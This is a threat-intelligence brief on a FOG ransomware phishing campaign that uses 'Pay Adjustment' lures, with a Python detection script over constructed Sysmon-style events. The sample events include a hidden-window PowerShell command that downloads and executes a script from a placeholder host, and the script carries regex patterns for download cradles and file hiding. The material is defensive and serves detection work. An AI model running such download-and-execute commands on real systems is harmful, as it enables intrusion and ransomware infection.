2025-05-01

Phishing Campaign Delivers FOG Ransomware via Fake “Pay Adjustment” Notices

Level: Tactical | Source: Trend Micro

Industries: Business Service, Education, Healthcare, Manufacturing, Retail, Technology, Transportation


Tracking of the FOG ransomware gang shows a continued escalation in its activity since its emergence, with phishing-based campaigns targeting a range of industries. Trend Micro reports 173 instances of FOG-attributed ransomware activity against its customer base since June 2024. Victims identified through the group’s leak site span technology, manufacturing, education, transportation, business services, healthcare, and retail. The ransomware appends a .flocked extension to encrypted files and drops a ransom note masquerading as communication from the “Department of Government Efficiency (DOGE).” Between January and March 2025, the group claimed 100 victims, peaking at 53 in February. The payloads observed in recent campaigns suggest either continued operations by FOG or repackaging of the ransomware by other actors.

Trend Micro's analysis of the infection chain reveals that initial access is achieved through phishing emails delivering a ZIP archive named "Pay Adjustment.zip." Inside the archive is a Windows shortcut file using a double extension, "Pay Adjustment.pdf.lnk," to appear as a benign document. Upon execution, the .lnk file launches "cmd.exe" with parameters that invoke PowerShell in a hidden window using the "-WindowStyle Hidden" flag. The PowerShell command uses "Invoke-WebRequest" (iwr) to download and execute "stage1.ps1" via "Invoke-Expression" (IEX). This initial script employs "attrib" to hide payload components and triggers a multi-stage delivery, ultimately retrieving a loader (cwiper.exe), a privilege escalation tool (ktool.exe), and secondary scripts. Persistence is achieved by placing files in startup directories, and political videos are opened as a decoy.

The "stage1.ps1" script distinguishes between standard and elevated privileges, placing ransomware payloads in appropriate startup locations and executing them silently. It collects system-level data via "lootsubmit.ps1," which performs geolocation via the Wigle API and sends hardware details to a command-and-control domain. The attacker’s toolkit also includes "trackerjacker.ps1," which refines MAC address resolution and obfuscates code via XOR encoding. Privilege escalation is conducted using "ktool.exe," which abuses the vulnerable "iQVW64.sys" driver. The ransomware loader embeds the encrypted payload within its data section and decrypts it with a hardcoded key, dropping both a ransom note (readme.txt) and an event logger ("dbgLog.sys"). Attribution to FOG ransomware is based on identical ransom notes found across variants, all instructing victims to access a Tor-based portal and referencing DOGE-related language.
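As an added example (not code from the Trend Micro report or from Anvilogic), the following Python detection logic runs over constructed Sysmon-style events and flags three observables from the chain described above: a double-extension .lnk being written to disk, cmd.exe spawning a hidden-window PowerShell with an iwr-to-iex download cradle, and attrib being used under a PowerShell parent to hide a dropped file. The user name, file paths and URL in the sample events are placeholders, not indicators from the report.

```python
import re

# Behavioural patterns taken from the infection chain described in the report.
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I)
DOWNLOAD_CRADLE = re.compile(
    r"\b(?:iwr|invoke-webrequest)\b.*\|\s*(?:iex|invoke-expression)\b", re.I)
DOUBLE_EXT_LNK = re.compile(r"\.(?:pdf|docx?|xlsx?|txt)\.lnk$", re.I)
ATTRIB_HIDE = re.compile(r"\battrib(?:\.exe)?\b.*\+h\b", re.I)

# Constructed events (Sysmon EID 1 process-create and EID 11 file-create shaped).
# "c2.invalid" and the user path are placeholders, not real indicators.
SAMPLE_EVENTS = [
    {"kind": "file", "image": r"C:\Windows\explorer.exe",
     "target": r"C:\Users\u\Downloads\Pay Adjustment.pdf.lnk"},
    {"kind": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c powershell.exe -WindowStyle Hidden -Command '
                r'"iwr http://c2.invalid/stage1.ps1 | iex"'},
    {"kind": "process", "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\attrib.exe",
     "cmdline": r"attrib +h +s C:\Users\u\AppData\Roaming\cwiper.exe"},
    {"kind": "process", "parent": r"C:\Windows\explorer.exe",          # benign admin use
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -Command Get-Date"},
    {"kind": "file", "image": r"C:\Windows\explorer.exe",              # benign document
     "target": r"C:\Users\u\Downloads\report.pdf"},
]


def detect(event):
    """Return the names of the rules that fire on a single event."""
    hits = []
    if event["kind"] == "file":
        if DOUBLE_EXT_LNK.search(event["target"]):
            hits.append("double_extension_lnk")
        return hits
    cmd = event["cmdline"]
    if HIDDEN_WINDOW.search(cmd) and DOWNLOAD_CRADLE.search(cmd):
        hits.append("hidden_download_cradle")
    if event["parent"].lower().endswith(("powershell.exe", "cmd.exe")) and ATTRIB_HIDE.search(cmd):
        hits.append("attrib_hide_payload")
    return hits


def scan(events):
    """Return (event index, fired rules) for every event that triggers at least one rule."""
    return [(i, detect(e)) for i, e in enumerate(events) if detect(e)]


if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS):
        print(idx, rules)
```

Correlating the three rules on one host within a short window gives a higher-confidence signal than any single rule, which on its own can also fire on legitimate administrative PowerShell use.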
